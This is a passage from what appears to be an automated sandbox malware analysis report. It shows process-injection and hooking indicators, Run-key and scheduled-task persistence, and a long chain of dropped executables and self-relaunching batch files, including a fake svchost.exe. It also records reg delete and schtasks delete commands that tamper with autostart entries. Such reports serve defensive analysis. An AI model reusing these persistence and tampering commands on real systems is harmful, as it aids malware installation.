19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe
19336	dwm.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
19424	svchost.exe
19740	svchost.exe
20024	svchost.exe
21660	svchost.exe
5132	svchost.exe
5428	svchost.exe
5708	svchost.exe
6404	svchost.exe
24140	XClient.exe
11096	svchost.exe
27148	svchost.exe
11892	svchost.exe
12040	PCclear_Eng_mini.exe
12040	PCclear_Eng_mini.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5008 wrote to memory of 4068	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	87
PID 5008 wrote to memory of 4068	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	87
PID 5008 wrote to memory of 4068	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	87
PID 5008 wrote to memory of 4424	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	89
PID 5008 wrote to memory of 4424	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	89
PID 5008 wrote to memory of 2356	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	90
PID 5008 wrote to memory of 2356	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	90
PID 5008 wrote to memory of 2356	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	90
PID 4424 wrote to memory of 4884	4424	Office.exe	93
PID 4424 wrote to memory of 4884	4424	Office.exe	93
PID 5008 wrote to memory of 4920	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	94
PID 5008 wrote to memory of 4920	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	94
PID 5008 wrote to memory of 4920	5008	2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe	94
PID 2356 wrote to memory of 3240	2356	pi.exe	97
PID 2356 wrote to memory of 3240	2356	pi.exe	97
PID 2356 wrote to memory of 3240	2356	pi.exe	97
PID 4884 wrote to memory of 2792	4884	svchost.exe	98
PID 4884 wrote to memory of 2792	4884	svchost.exe	98
PID 2792 wrote to memory of 3796	2792	cmd.exe	100
PID 2792 wrote to memory of 3796	2792	cmd.exe	100
PID 2792 wrote to memory of 4048	2792	cmd.exe	101
PID 2792 wrote to memory of 4048	2792	cmd.exe	101
PID 4920 wrote to memory of 5096	4920	s.exe	102
PID 4920 wrote to memory of 5096	4920	s.exe	102
PID 4920 wrote to memory of 5096	4920	s.exe	102
PID 4068 wrote to memory of 3732	4068	npp.exe	103
PID 4068 wrote to memory of 3732	4068	npp.exe	103
PID 4068 wrote to memory of 3732	4068	npp.exe	103
PID 3240 wrote to memory of 820	3240	sysppvrdnvs.exe	105
PID 3240 wrote to memory of 820	3240	sysppvrdnvs.exe	105
PID 3240 wrote to memory of 820	3240	sysppvrdnvs.exe	105
PID 3240 wrote to memory of 2216	3240	sysppvrdnvs.exe	107
PID 3240 wrote to memory of 2216	3240	sysppvrdnvs.exe	107
PID 3240 wrote to memory of 2216	3240	sysppvrdnvs.exe	107
PID 820 wrote to memory of 4420	820	cmd.exe	109
PID 820 wrote to memory of 4420	820	cmd.exe	109
PID 820 wrote to memory of 4420	820	cmd.exe	109
PID 2216 wrote to memory of 4400	2216	cmd.exe	110
PID 2216 wrote to memory of 4400	2216	cmd.exe	110
PID 2216 wrote to memory of 4400	2216	cmd.exe	110
PID 2216 wrote to memory of 2992	2216	cmd.exe	111
PID 2216 wrote to memory of 2992	2216	cmd.exe	111
PID 2216 wrote to memory of 2992	2216	cmd.exe	111
PID 2216 wrote to memory of 4372	2216	cmd.exe	112
PID 2216 wrote to memory of 4372	2216	cmd.exe	112
PID 2216 wrote to memory of 4372	2216	cmd.exe	112
PID 2216 wrote to memory of 3320	2216	cmd.exe	113
PID 2216 wrote to memory of 3320	2216	cmd.exe	113
PID 2216 wrote to memory of 3320	2216	cmd.exe	113
PID 2216 wrote to memory of 4020	2216	cmd.exe	114
PID 2216 wrote to memory of 4020	2216	cmd.exe	114
PID 2216 wrote to memory of 4020	2216	cmd.exe	114
PID 5096 wrote to memory of 4824	5096	sysvplervcs.exe	115
PID 5096 wrote to memory of 4824	5096	sysvplervcs.exe	115
PID 5096 wrote to memory of 4824	5096	sysvplervcs.exe	115
PID 5096 wrote to memory of 2084	5096	sysvplervcs.exe	117
PID 5096 wrote to memory of 2084	5096	sysvplervcs.exe	117
PID 5096 wrote to memory of 2084	5096	sysvplervcs.exe	117
PID 4824 wrote to memory of 1492	4824	cmd.exe	119
PID 4824 wrote to memory of 1492	4824	cmd.exe	119
PID 4824 wrote to memory of 1492	4824	cmd.exe	119
PID 2084 wrote to memory of 2272	2084	cmd.exe	120
PID 2084 wrote to memory of 2272	2084	cmd.exe	120
PID 2084 wrote to memory of 2272	2084	cmd.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3532
- C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
  "C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4068
  - - C:\Users\Admin\AppData\Local\Temp\1548427715.exe
      C:\Users\Admin\AppData\Local\Temp\1548427715.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:3732
    - - C:\Windows\sysnldcvmr.exe
        
        C:\Windows\sysnldcvmr.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: SetClipboardViewer
        
        PID:2940
      - C:\Users\Admin\AppData\Local\Temp\531210104.exe
        
        C:\Users\Admin\AppData\Local\Temp\531210104.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:17016
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:17096
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:17188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:17120
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:17212
      - C:\Users\Admin\AppData\Local\Temp\1142231072.exe
        
        C:\Users\Admin\AppData\Local\Temp\1142231072.exe
        6⤵
        Executes dropped EXE
        
        PID:17480
      - C:\Users\Admin\AppData\Local\Temp\1475019939.exe
        
        C:\Users\Admin\AppData\Local\Temp\1475019939.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:18156
        
        C:\Users\Admin\AppData\Local\Temp\3402010102.exe
        
        C:\Users\Admin\AppData\Local\Temp\3402010102.exe
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:18296
      - C:\Users\Admin\AppData\Local\Temp\14548093.exe
        
        C:\Users\Admin\AppData\Local\Temp\14548093.exe
        6⤵
        Executes dropped EXE
        
        PID:18356
      - C:\Users\Admin\AppData\Local\Temp\1483322851.exe
        
        C:\Users\Admin\AppData\Local\Temp\1483322851.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:22688
        
        C:\Users\Admin\sysnldcvmr.exe
        
        C:\Users\Admin\sysnldcvmr.exe
        7⤵
        Executes dropped EXE
        
        PID:22888
        
        C:\Users\Admin\AppData\Local\Temp\52263531.exe
        
        C:\Users\Admin\AppData\Local\Temp\52263531.exe
        8⤵
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        
        PID:6052
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:3316
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        10⤵
        
        PID:968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:640
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        10⤵
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\2760524604.exe
        
        C:\Users\Admin\AppData\Local\Temp\2760524604.exe
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:24460
        
        C:\Users\Admin\AppData\Local\Temp\1740414134.exe
        
        C:\Users\Admin\AppData\Local\Temp\1740414134.exe
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:10044
        
        C:\Users\Admin\AppData\Local\Temp\14942337.exe
        
        C:\Users\Admin\AppData\Local\Temp\14942337.exe
        8⤵
        
        PID:6904
- - C:\Users\Admin\AppData\Local\Temp\Files\Office.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Office.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4424
  - - C:\Users\Admin\AppData\Roaming\Office\svchost.exe
      "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6qOyk5FaZVEF.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2792
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:3796
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4048
      - C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cqxBuGrKdTzY.bat" "
        7⤵
        
        PID:768
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4616
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1656
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KhVJbOVXz7HX.bat" "
        9⤵
        
        PID:1636
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:3572
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2632
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:8672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HPvJ3GwkxGYu.bat" "
        11⤵
        
        PID:8744
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:8804
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8820
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:9124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\w3jBNJBhWU6y.bat" "
        13⤵
        
        PID:4828
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:15460
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:15476
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:15892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6kOZ0nYEwOqZ.bat" "
        15⤵
        
        PID:15988
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:16036
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:16052
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:16172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\b6unfxglwNos.bat" "
        17⤵
        
        PID:16244
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:16308
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:16324
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:16424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CIv9c7sz7QZ6.bat" "
        19⤵
        
        PID:16500
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:16536
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:16620
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:16712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\46MePfshTGBI.bat" "
        21⤵
        
        PID:16800
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:16848
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:16864
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:17004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\f4idl1RRLJ7C.bat" "
        23⤵
        
        PID:17284
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:17328
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:17344
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:17776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tUE7hG63uiOP.bat" "
        25⤵
        
        PID:17928
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:17992
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:18080
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:18412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G4GfFF0Aj4e2.bat" "
        27⤵
        
        PID:18560
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:18608
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:18624
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:19424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zy5zPy5K639Q.bat" "
        29⤵
        
        PID:19544
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:19600
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:19612
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:19740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RE2vUVaVmeGA.bat" "
        31⤵
        
        PID:19824
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:19876
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:19896
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        32⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:20024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TF6BeE3aJufX.bat" "
        33⤵
        
        PID:20120
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        34⤵
        
        PID:20164
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:20176
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        34⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:20296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3kfTva41YNOX.bat" "
        35⤵
        
        PID:20376
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        36⤵
        
        PID:20424
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:20440
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        36⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:20612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Uee5u6ruNj3X.bat" "
        37⤵
        
        PID:20692
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        38⤵
        
        PID:20736
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:20752
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        38⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:20868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HLUBAY9y353o.bat" "
        39⤵
        
        PID:20952
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        40⤵
        
        PID:20996
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        40⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:21012
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        40⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:21124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kRZeowg2iOm9.bat" "
        41⤵
        
        PID:21228
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        42⤵
        
        PID:21276
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:21292
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        42⤵
        Executes dropped EXE
        
        PID:21392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VigsnQza1r3a.bat" "
        43⤵
        
        PID:21476
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        44⤵
        
        PID:21524
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        44⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:21540
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        44⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:21660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\44d7af45Wsbt.bat" "
        45⤵
        
        PID:21752
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        46⤵
        
        PID:21796
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        46⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:21808
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        46⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:21924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rZmhOmIrswFh.bat" "
        47⤵
        
        PID:22020
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        48⤵
        
        PID:22280
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:22296
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        48⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:22428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NXw0UWxuZWwx.bat" "
        49⤵
        
        PID:22516
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        50⤵
        
        PID:4188
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        50⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2556
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        50⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\p8mcOzBHTSEy.bat" "
        51⤵
        
        PID:4588
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        52⤵
        
        PID:3504
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        52⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4276
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        52⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZkVvyAyhMr4i.bat" "
        53⤵
        
        PID:1388
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        54⤵
        
        PID:5108
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1128
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        54⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9i2E0HxLcYxR.bat" "
        55⤵
        
        PID:5212
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        56⤵
        
        PID:5260
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        56⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5276
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        56⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fn8Ux7feUcuM.bat" "
        57⤵
        
        PID:5516
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        58⤵
        
        PID:5568
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        58⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5584
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        58⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dBm6HzzVqG3R.bat" "
        59⤵
        
        PID:5792
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        60⤵
        
        PID:5836
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        60⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:22080
        
        C:\Users\Admin\AppData\Roaming\Office\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Office\svchost.exe"
        60⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:22184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1L3F27gTzNC6.bat" "
        61⤵
        
        PID:22260
        
